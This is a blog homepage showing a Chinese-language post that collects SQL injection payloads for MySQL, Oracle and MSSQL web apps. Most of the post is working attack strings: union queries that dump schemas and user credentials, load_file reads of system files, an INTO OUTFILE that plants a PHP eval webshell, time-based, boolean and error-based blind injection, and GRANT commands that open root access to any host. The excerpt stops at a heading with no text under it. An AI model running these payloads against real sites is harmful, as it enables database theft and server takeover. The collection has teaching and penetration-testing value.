<!DOCTYPE html><html lang="en"><head><meta charset="UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=edge"><meta name="viewport" content="width=device-width, initial-scale=1"><meta name="format-detection" content="telephone=no"><meta name="apple-mobile-web-app-capable" content="yes"><meta name="apple-mobile-web-app-status-bar-style" content="black"><link rel="icon" href="/images/icons/favicon-16x16.png?v=2.6.2" type="image/png" sizes="16x16"><link rel="icon" href="/images/icons/favicon-32x32.png?v=2.6.2" type="image/png" sizes="32x32"><meta property="og:type" content="website">
<meta property="og:title" content="Hexo">
<meta property="og:url" content="http://example.com/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:locale" content="en_US">
<meta property="article:author" content="John Doe">
<meta name="twitter:card" content="summary"><title>Hexo</title><link rel="canonical" href="http://example.com/index.html"><link rel="dns-prefetch" href="https://cdn.jsdelivr.net"><link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/@fortawesome/[email protected]/css/all.min.css" type="text/css"><link rel="stylesheet" href="/css/index.css?v=2.6.2"><script>var Stun = window.Stun || {};
// Client-side configuration object for the theme. The template emits it
// inline and publishes it as window.CONFIG on the statement following this
// block; the theme's scripts presumably read it from there. Keys whose value
// is `undefined` are still own properties of the object.
var CONFIG = {};

// Site root and (unconfigured) search providers.
CONFIG.root = '/';
CONFIG.algolia = undefined;
CONFIG.assistSearch = undefined;

// Icon class names for inline prompts and the copy button.
CONFIG.fontIcon = {
  prompt: {
    success: 'fas fa-check-circle',
    info: 'fas fa-arrow-circle-right',
    warning: 'fas fa-exclamation-circle',
    error: 'fas fa-times-circle'
  },
  copyBtn: 'fas fa-copy'
};

// Layout and widget switches.
CONFIG.sidebar = { offsetTop: '20px', tocMaxDepth: 6 };
CONFIG.header = { enable: true, showOnPost: true, scrollDownIcon: false };
CONFIG.postWidget = { endText: true };
CONFIG.nightMode = { enable: true };
CONFIG.back2top = { enable: true };
CONFIG.codeblock = { style: 'default', highlight: 'light', wordWrap: false };
CONFIG.reward = false;
CONFIG.fancybox = false;
CONFIG.zoomImage = { gapAside: '20px' };
CONFIG.galleryWaterfall = undefined;
CONFIG.lazyload = false;
CONFIG.pjax = undefined;

// Marker icon for external links (name suggests it is appended to such links — not verifiable here).
CONFIG.externalLink = { icon: { enable: true, name: 'fas fa-external-link-alt' } };
CONFIG.shortcuts = undefined;

// User-visible strings for the code-copy prompt.
CONFIG.prompt = { copyButton: 'Copy', copySuccess: 'Copy Success', copyError: 'Copy Error' };

// Asset sub-directory names, presumably resolved relative to CONFIG.root.
CONFIG.sourcePath = { js: 'js', css: 'css', images: 'images' };
window.CONFIG = CONFIG;</script><meta name="generator" content="Hexo 5.4.0"></head><body><div class="container" id="container"><header class="header" id="header"><div class="header-inner"><nav class="header-nav header-nav--fixed"><div class="header-nav-inner"><div class="header-nav-menubtn"><i class="fas fa-bars"></i></div><div class="header-nav-menu"><div class="header-nav-menu-item"><a class="header-nav-menu-item__link" href="/"><span class="header-nav-menu-item__icon"><i class="fas fa-home"></i></span><span class="header-nav-menu-item__text">Home</span></a></div><div class="header-nav-menu-item"><a class="header-nav-menu-item__link" href="/archives/"><span class="header-nav-menu-item__icon"><i class="fas fa-folder-open"></i></span><span class="header-nav-menu-item__text">Archives</span></a></div></div><div class="header-nav-mode"><div class="mode"><div class="mode-track"><span class="mode-track-moon"></span><span class="mode-track-sun"></span></div><div class="mode-thumb"></div></div></div></div></nav><div class="header-banner"><div class="header-banner-info"><div class="header-banner-info__title">Hexo</div><div class="header-banner-info__subtitle"></div></div></div></div></header><main class="main" id="main"><div class="main-inner"><div class="content-wrap" id="content-wrap"><div class="content content-home" id="content"><section class="postlist"><article class="postlist-item post"><header class="post-header"><h1 class="post-title"><a class="post-title__link" href="/2021/12/01/-0-SQL%E6%B3%A8%E5%85%A5payload/">SQL注入payload</a></h1><div class="post-meta"><span class="post-meta-item post-meta-item--createtime"><span class="post-meta-item__icon"><i class="far fa-calendar-plus"></i></span><span class="post-meta-item__info">Created</span><span class="post-meta-item__value">2021-12-01</span></span><span class="post-meta-item post-meta-item--updatetime"><span class="post-meta-item__icon"><i class="far fa-calendar-check"></i></span><span 
class="post-meta-item__info">Updated</span><span class="post-meta-item__value">2021-12-01</span></span></div></header><div class="post-body"><div class="post-excerpt">
<h1 id="SQL注入" >
<a href="#SQL注入" class="heading-link"><i class="fas fa-link"></i></a><a href="#SQL注入" class="headerlink" title="SQL注入"></a>SQL注入</h1>
<p>SQL注入是比较常见的网络攻击方式之一,它不是利用操作系统的BUG来实现攻击,而是针对程序员编写时的疏忽,通过SQL语句,实现无账号登录,甚至篡改数据库。</p>
<p>攻击总体思路:</p>
<p>1:寻找到SQL注入的位置</p>
<p>2:判断服务器类型和后台数据库类型</p>
<p>3:针对不同的服务器和数据库特点进行SQL注入攻击</p>
<h2 id="0x00-SQL基本语法" >
<a href="#0x00-SQL基本语法" class="heading-link"><i class="fas fa-link"></i></a><a href="#0x00-SQL基本语法" class="headerlink" title="0x00 SQL基本语法"></a>0x00 SQL基本语法</h2>
<p>MySQL开启远程连接:<strong>GRANT ALL PRIVILEGES ON *.* TO '用户名'@'%' IDENTIFIED BY '密码' WITH GRANT OPTION;</strong>(这里的 '%' 表示允许来自任意主机的连接,且授予的是所有库的全部权限)</p>
<h3 id="0-表的用途" >
<a href="#0-表的用途" class="heading-link"><i class="fas fa-link"></i></a><a href="#0-表的用途" class="headerlink" title="0 表的用途"></a>0 表的用途</h3>
<p>MySQL</p>
<figure class="highlight sql"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">information_schema.schemata 存放所有数据库</span><br><span class="line"> schema_name 数据库名称</span><br><span class="line"></span><br><span class="line">information_schema.tables 存放所有数据库的表</span><br><span class="line"> table_schema 数据库名称</span><br><span class="line"> table_name 表名称</span><br><span class="line"> </span><br><span class="line">information_schema.columns 存放所有数据库的列</span><br><span class="line"> table_schema 数据库名称</span><br><span class="line"> table_name 表名称</span><br><span class="line"> column_name 列名称</span><br></pre></td></tr></table></div></figure>
<h3 id="1-SELECT" >
<a href="#1-SELECT" class="heading-link"><i class="fas fa-link"></i></a><a href="#1-SELECT" class="headerlink" title="1 SELECT"></a>1 SELECT</h3>
<p>SELECT * FROM 数据库.表</p>
<h3 id="2-INSERT" >
<a href="#2-INSERT" class="heading-link"><i class="fas fa-link"></i></a><a href="#2-INSERT" class="headerlink" title="2 INSERT"></a>2 INSERT</h3>
<p>INSERT INTO table_name (column_list) VALUES (value_list);</p>
<h3 id="3-UPDATE" >
<a href="#3-UPDATE" class="heading-link"><i class="fas fa-link"></i></a><a href="#3-UPDATE" class="headerlink" title="3 UPDATE"></a>3 UPDATE</h3>
<p>UPDATE subDomainDic SET type4domain=NULL,dic_target=0,domain_target=NULL WHERE dic_target=1;</p>
<h3 id="4-DELETE" >
<a href="#4-DELETE" class="heading-link"><i class="fas fa-link"></i></a><a href="#4-DELETE" class="headerlink" title="4 DELETE"></a>4 DELETE</h3>
<p>DELETE FROM table_name WHERE predicate;</p>
<h3 id="5-基本函数" >
<a href="#5-基本函数" class="heading-link"><i class="fas fa-link"></i></a><a href="#5-基本函数" class="headerlink" title="5 基本函数"></a>5 基本函数</h3>
<p>MySQL</p>
<figure class="highlight sql"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">mid</span><br><span class="line">substr</span><br><span class="line">group_concat</span><br><span class="line">Load_file(file_name):读取文件并返回该文件的内容作为一个字符串。</span><br></pre></td></tr></table></div></figure>
<h3 id="6-基本语句" >
<a href="#6-基本语句" class="heading-link"><i class="fas fa-link"></i></a><a href="#6-基本语句" class="headerlink" title="6 基本语句"></a>6 基本语句</h3>
<figure class="highlight sql"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">显示版本:<span class="keyword">select</span> version();</span><br><span class="line">显示字符集:<span class="keyword">select</span> @<span class="variable">@character</span>_set_database;</span><br><span class="line">显示数据库<span class="keyword">show</span> databases;</span><br><span class="line">显示表名:<span class="keyword">show</span> tables;</span><br><span class="line">显示计算机名:<span class="keyword">select</span> @<span class="variable">@hostname</span>;</span><br><span class="line">显示系统版本:<span class="keyword">select</span> @<span class="variable">@version</span>_compile_os;</span><br><span class="line">显示mysql路径:<span class="keyword">select</span> @<span class="variable">@basedir</span>;</span><br><span class="line">显示数据库路径:<span class="keyword">select</span> @<span class="variable">@datadir</span>;</span><br><span class="line">显示root密码:<span class="keyword">select</span> <span class="keyword">User</span>,Password <span class="keyword">from</span> mysql.user;</span><br><span class="line">开启外连:<span class="keyword">GRANT</span> <span class="keyword">ALL</span> PRIVILEGES <span class="keyword">ON</span> <span class="operator">*</span>.<span class="operator">*</span> <span class="keyword">TO</span> <span class="string">'root'</span>@<span class="string">'%'</span> IDENTIFIED <span class="keyword">BY</span> <span class="string">'123456'</span> <span class="keyword">WITH</span> <span class="keyword">GRANT</span> OPTION;</span><br></pre></td></tr></table></div></figure>
<h3 id="x-中间件容器解析的区别" >
<a href="#x-中间件容器解析的区别" class="heading-link"><i class="fas fa-link"></i></a><a href="#x-中间件容器解析的区别" class="headerlink" title="x 中间件容器解析的区别"></a>x 中间件容器解析的区别</h3>
<figure class="highlight sql"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">index.php?id<span class="operator">=</span><span class="number">1</span><span class="operator">&</span>id<span class="operator">=</span><span class="number">2</span></span><br><span class="line">apache(php)解析最后一个参数,即显示id<span class="operator">=</span><span class="number">2</span>的内容。</span><br><span class="line">Tomcat(jsp)解析第一个参数,即显示id<span class="operator">=</span><span class="number">1</span>的内容。</span><br><span class="line"></span><br></pre></td></tr></table></div></figure>
<div class="table-container"><table>
<thead>
<tr>
<th align="center">Web服务器</th>
<th align="center">参数获取函数</th>
<th align="center">获取到的参数</th>
</tr>
</thead>
<tbody><tr>
<td align="center">PHP/Apache</td>
<td align="center">$_GET["par"]</td>
<td align="center">Last</td>
</tr>
<tr>
<td align="center">JSP/Tomcat</td>
<td align="center">Request.getParameter(“par”)</td>
<td align="center">First</td>
</tr>
<tr>
<td align="center">Perl(CGI)/Apache</td>
<td align="center">Param(“par”)</td>
<td align="center">First</td>
</tr>
<tr>
<td align="center">Python/Apache</td>
<td align="center">getvalue(“par”)</td>
<td align="center">All(list)</td>
</tr>
<tr>
<td align="center">ASP/IIS</td>
<td align="center">Request.QueryString(“par”)</td>
<td align="center">All(comma-delimited string)</td>
</tr>
</tbody></table></div>
<h3 id="不同数据库的注入判断" >
<a href="#不同数据库的注入判断" class="heading-link"><i class="fas fa-link"></i></a><a href="#不同数据库的注入判断" class="headerlink" title="不同数据库的注入判断"></a>不同数据库的注入判断</h3>
<figure class="highlight sql"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"># Oracle</span><br><span class="line"><span class="string">'+UNION+SELECT+'</span>abc<span class="string">','</span>def<span class="string">'+FROM+dual--</span></span><br><span class="line"><span class="string"># 显示数据库版本: </span></span><br><span class="line"><span class="string">'</span><span class="operator">+</span><span class="keyword">UNION</span><span class="operator">+</span><span class="keyword">SELECT</span><span class="operator">+</span>BANNER,<span class="operator">+</span><span class="keyword">NULL</span><span class="operator">+</span><span class="keyword">FROM</span><span class="operator">+</span>v$version<span class="comment">--</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line"># MSSQL</span><br><span class="line"><span class="string">'+UNION+SELECT+'</span>abc<span class="string">','</span>def<span class="string">'#</span></span><br><span class="line"><span class="string">'</span><span class="keyword">UNION</span><span class="operator">+</span><span class="keyword">SELECT</span><span class="operator">+</span>@<span class="variable">@version</span>,<span class="operator">+</span><span class="keyword">NULL</span><span class="comment">--+a</span></span><br><span class="line"># 检索数据库中的表列表: <span class="string">'+UNION+SELECT+table_name,+NULL+FROM+information_schema.tables--</span></span><br></pre></td></tr></table></div></figure>
<h2 id="0x01-SQL注入基础" >
<a href="#0x01-SQL注入基础" class="heading-link"><i class="fas fa-link"></i></a><a href="#0x01-SQL注入基础" class="headerlink" title="0x01 SQL注入基础"></a>0x01 SQL注入基础</h2>
<h3 id="1-常规注入" >
<a href="#1-常规注入" class="heading-link"><i class="fas fa-link"></i></a><a href="#1-常规注入" class="headerlink" title="1 常规注入"></a>1 常规注入</h3>
<p>爆数据库</p>
<figure class="highlight sql"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id<span class="operator">=</span><span class="number">1</span> <span class="keyword">and</span> <span class="number">1</span><span class="operator">=</span><span class="number">2</span> <span class="keyword">union</span> <span class="keyword">select</span> <span class="number">1</span>,<span class="number">2</span>,group_concat(schema_name) <span class="keyword">from</span> information_schema.schemata<span class="comment">--</span></span><br></pre></td></tr></table></div></figure>
<p>爆数据表</p>
<figure class="highlight sql"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id<span class="operator">=</span><span class="number">1</span><span class="string">') and 1=2 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='</span>security<span class="string">'--+</span></span><br></pre></td></tr></table></div></figure>
<p>爆数据列</p>
<figure class="highlight sql"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id<span class="operator">=</span><span class="number">1</span><span class="string">') and 1=2 union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='</span>security<span class="string">' and table_name='</span>users<span class="string">'--+</span></span><br></pre></td></tr></table></div></figure>
<p>爆数据</p>
<figure class="highlight sql"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id<span class="operator">=</span><span class="number">1</span><span class="string">') and 1=2 union select 1,group_concat(username),group_concat(password) from security.users--+</span></span><br></pre></td></tr></table></div></figure>
<p>查看是否具有读取权限</p>
<figure class="highlight sql"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"># 如果结果返回正常,说明当前用户具有对 mysql.user 的读取权限。</span><br><span class="line"><span class="keyword">select</span> (<span class="keyword">select</span> <span class="built_in">count</span>(<span class="operator">*</span>) <span class="keyword">from</span> mysql.user)<span class="operator">></span><span class="number">0</span>;</span><br></pre></td></tr></table></div></figure>
<p>读文件</p>
<figure class="highlight sql"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">Select</span> <span class="number">1</span>,<span class="number">2</span>,<span class="number">3</span>,<span class="number">4</span>,<span class="number">5</span>,<span class="number">6</span>,<span class="number">7</span>,hex(replace(load_file(<span class="type">char</span>(<span class="number">99</span>,<span class="number">58</span>,<span class="number">92</span>,<span class="number">119</span>,<span class="number">105</span>,<span class="number">110</span>,<span class="number">100</span>,<span class="number">111</span>,<span class="number">119</span>,<span class="number">115</span>,<span class="number">92</span>,<span class="number">114</span>,<span class="number">101</span>,<span class="number">112</span>,<span class="number">97</span>,<span class="number">105</span>,<span class="number">114</span>,<span class="number">92</span>,<span class="number">115</span>,<span class="number">97</span>,<span class="number">109</span>)))</span><br><span class="line"></span><br><span class="line">利用hex()将文件内容导出来,尤其是smb文件时可以使用。</span><br><span class="line"><span class="number">-1</span> <span class="keyword">union</span> <span class="keyword">select</span> <span class="number">1</span>,<span class="number">1</span>,<span class="number">1</span>,load_file(<span class="type">char</span>(<span class="number">99</span>,<span class="number">58</span>,<span class="number">47</span>,<span class="number">98</span>,<span class="number">111</span>,<span class="number">111</span>,<span 
class="number">116</span>,<span class="number">46</span>,<span class="number">105</span>,<span class="number">110</span>,<span class="number">105</span>))</span><br><span class="line">Explain:“<span class="type">char</span>(<span class="number">99</span>,<span class="number">58</span>,<span class="number">47</span>,<span class="number">98</span>,<span class="number">111</span>,<span class="number">111</span>,<span class="number">116</span>,<span class="number">46</span>,<span class="number">105</span>,<span class="number">110</span>,<span class="number">105</span>)”就是“c:<span class="operator">/</span>boot.ini”的ASCII代码</span><br><span class="line"><span class="number">-1</span> <span class="keyword">union</span> <span class="keyword">select</span> <span class="number">1</span>,<span class="number">1</span>,<span class="number">1</span>,load_file(<span class="number">0x633a2f626f6f742e696e69</span>)</span><br><span class="line">Explain:“c:<span class="operator">/</span>boot.ini”的<span class="number">16</span>进制是“<span class="number">0x633a2f626f6f742e696e69</span>”</span><br><span class="line"><span class="number">-1</span> <span class="keyword">union</span> <span class="keyword">select</span> <span class="number">1</span>,<span class="number">1</span>,<span class="number">1</span>,load_file(c:\\boot.ini)</span><br><span class="line">Explain:路径里的<span class="operator">/</span>用\\代替</span><br><span class="line"></span><br></pre></td></tr></table></div></figure>
<p>文件导入</p>
<figure class="highlight sql"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id<span class="operator">=</span><span class="number">1</span><span class="string">')) UNION SELECT 1,2,'</span><span class="operator"><</span>?php<span class="variable">@eval</span>($_post[“mima”])?<span class="operator">></span><span class="string">' into outfile "c:\\wamp\\www\\sqllib\\Less-7\\yijuhua.php"--+</span></span><br></pre></td></tr></table></div></figure>
<h3 id="3-基于时间的盲注" >
<a href="#3-基于时间的盲注" class="heading-link"><i class="fas fa-link"></i></a><a href="#3-基于时间的盲注" class="headerlink" title="3 基于时间的盲注"></a>3 基于时间的盲注</h3>
<p>if判断</p>
<figure class="highlight sql"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br></pre></td><td class="code"><pre><span class="line"># if表达式 如果a表达式为真,则执行b表达式,为假则执行c表达式</span><br><span class="line">if(a, b, c)</span><br><span class="line">?id<span class="operator">=</span><span class="number">2</span><span class="string">' or if(1,sleep(2),1)--+</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">and (SELECT 7621 FROM (SELECT(SLEEP(5)))fjCb)--+</span></span><br><span class="line"><span class="string">and (SELECT * FROM (SELECT(if(1,sleep(5),1)))aaa)#</span></span><br><span class="line"><span class="string">AND (SELECT 7684 FROM (SELECT(SLEEP(5)))mRcs)</span></span><br></pre></td></tr></table></div></figure>
<p>利用sleep函数进行注入</p>
<figure class="highlight sql"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"># 若为假则延时五秒</span><br><span class="line">?id<span class="operator">=</span><span class="number">1</span><span class="string">'and If(ascii(substr(database(),1,1))=115,1,sleep(5))--+</span></span><br></pre></td></tr></table></div></figure>
<p>利用BENCHMARK()进行延时注入</p>
<figure class="highlight sql"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"># 当结果正确的时候,运行ENCODE(<span class="string">'MSG'</span>,<span class="string">'by5seconds'</span>)操作<span class="number">50000000</span>次,会占用一段时间。</span><br><span class="line">?id<span class="operator">=</span><span class="number">1</span><span class="string">'UNION SELECT(IF(SUBSTRING(current,1,1)=CHAR(115),BENCHMARK(50000000,ENCODE('</span>MSG<span class="string">','</span><span class="keyword">by</span> <span class="number">5</span> seconds<span class="string">')),null)),2,3 FROM(select database() as current)as tb1--+</span></span><br></pre></td></tr></table></div></figure>
<h3 id="4-基于布尔的盲注" >
<a href="#4-基于布尔的盲注" class="heading-link"><i class="fas fa-link"></i></a><a href="#4-基于布尔的盲注" class="headerlink" title="4 基于布尔的盲注"></a>4 基于布尔的盲注</h3>
<figure class="highlight sql"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"># rand()布尔判断</span><br><span class="line">rand(<span class="literal">true</span>), rand(<span class="literal">false</span>)</span><br><span class="line">?sort<span class="operator">=</span>rand(ascii(<span class="keyword">left</span>(database(),<span class="number">1</span>))<span class="operator">=</span><span class="number">115</span>)</span><br><span class="line"></span><br><span class="line">###</span><br><span class="line"><span class="keyword">select</span> rand(ascii(<span class="keyword">left</span>(database(),<span class="number">1</span>))<span class="operator">=</span><span class="number">115</span>);</span><br><span class="line"><span class="operator">+</span><span class="comment">-------------------------------------+</span></span><br><span class="line"><span class="operator">|</span> rand(ascii(<span class="keyword">left</span>(database(),<span class="number">1</span>))<span class="operator">=</span><span class="number">115</span>) <span class="operator">|</span></span><br><span class="line"><span class="operator">+</span><span class="comment">-------------------------------------+</span></span><br><span class="line"><span class="operator">|</span> <span 
class="number">0.40540353712197724</span> <span class="operator">|</span></span><br><span class="line"><span class="operator">+</span><span class="comment">-------------------------------------+</span></span><br><span class="line"><span class="keyword">select</span> rand(<span class="literal">true</span>);</span><br><span class="line"><span class="operator">+</span><span class="comment">---------------------+</span></span><br><span class="line"><span class="operator">|</span> rand(<span class="literal">true</span>) <span class="operator">|</span></span><br><span class="line"><span class="operator">+</span><span class="comment">---------------------+</span></span><br><span class="line"><span class="operator">|</span> <span class="number">0.40540353712197724</span> <span class="operator">|</span></span><br><span class="line"><span class="operator">+</span><span class="comment">---------------------+</span></span><br><span class="line"></span><br><span class="line"># buer</span><br><span class="line">id<span class="operator">=</span>(<span class="keyword">SELECT</span> (<span class="keyword">CASE</span> <span class="keyword">WHEN</span> (<span class="number">9647</span><span class="operator">=</span><span class="number">9647</span>) <span class="keyword">THEN</span> <span class="number">14</span> <span class="keyword">ELSE</span> (<span class="keyword">SELECT</span> <span class="number">6297</span> <span class="keyword">UNION</span> <span class="keyword">SELECT</span> <span class="number">2981</span>) <span class="keyword">END</span>))</span><br></pre></td></tr></table></div></figure>
<p>判断数据库版本第一位</p>
<figure class="highlight sql"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id<span class="operator">=</span><span class="number">1</span><span class="string">' and left(version(),1)=5--+</span></span><br></pre></td></tr></table></div></figure>
<p>判断数据库长度</p>
<figure class="highlight sql"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id<span class="operator">=</span><span class="number">1</span><span class="string">' and length(database())=8--+</span></span><br></pre></td></tr></table></div></figure>
<p>判断数据库第一位</p>
<figure class="highlight sql"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id<span class="operator">=</span><span class="number">1</span><span class="string">' and left(database(),1)>'</span>a<span class="string">';--+</span></span><br></pre></td></tr></table></div></figure>
<p>判断数据库第一位ascii</p>
<figure class="highlight sql"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id<span class="operator">=</span><span class="number">1</span><span class="string">' and ascii(left(database(),1))>100--+</span></span><br></pre></td></tr></table></div></figure>
<p>布尔盲注获取数据表信息</p>
<figure class="highlight sql"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">substr((<span class="keyword">select</span> table_name <span class="keyword">from</span> information_schema.tables <span class="keyword">where</span> table_schema<span class="operator">=</span>database() limit <span class="number">0</span>,<span class="number">1</span>),<span class="number">1</span>,<span class="number">1</span>)</span><br><span class="line"># limit <span class="number">0</span>,<span class="number">1</span>限制显示第一个表 substr限制数据结果的位数显示</span><br><span class="line"># 可组合其他函数使用,如ascii</span><br></pre></td></tr></table></div></figure>
<h3 id="5-报错注入" >
<a href="#5-报错注入" class="heading-link"><i class="fas fa-link"></i></a><a href="#5-报错注入" class="headerlink" title="5 报错注入"></a>5 报错注入</h3>
<p>xpath 函数报错(extractvalue / updatexml)</p>
<figure class="highlight sql"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"># extractvalue</span><br><span class="line">?id<span class="operator">=</span><span class="number">1</span><span class="string">' and extractvalue(1,concat(0x7e,(select @@version),0x7e))--+</span></span><br><span class="line"><span class="string"># updatexml</span></span><br><span class="line"><span class="string">?id=1'</span> <span class="keyword">and</span> updatexml(<span class="number">1</span>,concat(<span class="number">0x7e</span>,(<span class="keyword">select</span> @<span class="variable">@version</span>),<span class="number">0x7e</span>),<span class="number">1</span>)<span class="comment">--+</span></span><br></pre></td></tr></table></div></figure>
<figure class="highlight sql"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">AND</span> GTID_SUBSET(CONCAT(<span class="number">0x717a6a7071</span>,(<span class="keyword">SELECT</span> (ELT(<span class="number">2101</span><span class="operator">=</span><span class="number">2101</span>,<span class="number">1</span>))),<span class="number">0x71716a6b71</span>),<span class="number">2101</span>)<span class="comment">--</span></span><br><span class="line"></span><br><span class="line">(<span class="keyword">SELECT</span> <span class="number">0x526e5452</span> <span class="keyword">WHERE</span> <span class="number">8019</span><span class="operator">=</span><span class="number">8019</span> <span class="keyword">AND</span> GTID_SUBSET(CONCAT(<span class="number">0x7171787671</span>,(<span class="keyword">SELECT</span> (ELT(<span class="number">5727</span><span class="operator">=</span><span class="number">5727</span>,<span class="number">1</span>))),<span class="number">0x716b7a7171</span>),<span class="number">5727</span>))</span><br></pre></td></tr></table></div></figure>
<figure class="highlight plaintext"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"># 数据库数量</span><br><span class="line">admin' AND GTID_SUBSET(CONCAT(0x716b7a7071,(SELECT IFNULL(CAST(COUNT(schema_name) AS NCHAR),0x20) FROM INFORMATION_SCHEMA.SCHEMATA),0x71627a7671),8132)-- gqgS</span><br><span class="line"></span><br><span class="line"># CAST 转换数据类型</span><br><span class="line">CAST(COUNT(schema_name) AS NCHAR)</span><br><span class="line">将COUNT(schema_name)转换为NCHAR型</span><br></pre></td></tr></table></div></figure>
<p>floor(rand(0)*2) 报错</p>
<figure class="highlight sql"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line">?id<span class="operator">=</span><span class="number">1</span><span class="string">' union Select 1,count(*),concat(0x3a,0x3a,(select user()),0x3a,0x3a,floor(rand(0)*2))a from information_schema.columns group by a--+</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">?sort=(select count(*) from information_schema.columns group by concat(0x3a,0x3a,(select user()),0x3a,0x3a,floor(rand()*2)))--+</span></span><br><span class="line"><span class="string"></span></span><br><span class="line"><span class="string">?sort=1'</span><span class="keyword">and</span> (<span class="keyword">select</span> <span class="built_in">count</span>(<span class="operator">*</span>) <span class="keyword">from</span> information_schema.columns <span class="keyword">group</span> <span class="keyword">by</span> concat(<span class="number">0x3a</span>,<span class="number">0x3a</span>,(<span class="keyword">select</span> <span class="keyword">user</span>()),<span class="number">0x3a</span>,<span class="number">0x3a</span>,<span class="built_in">floor</span>(rand()<span class="operator">*</span><span class="number">2</span>)))<span class="comment">--+</span></span><br></pre></td></tr></table></div></figure>
<p>double数值类型超出范围进行报错注入</p>
<figure class="highlight sql"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id<span class="operator">=</span><span class="number">1</span><span class="string">' union select (exp(~(select * FROM(SELECT USER())a))),2,3--+</span></span><br></pre></td></tr></table></div></figure>
<p>bigint溢出</p>
<figure class="highlight sql"><div class="table-container"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">?id<span class="operator">=</span><span class="number">1</span><span class="string">' union select (!(select * from (select user())x) - ~0),2,3--+</span></span><br></pre></td></tr></table></div></figure>
<p>利用重复列名报错(NAME_CONST)</p>
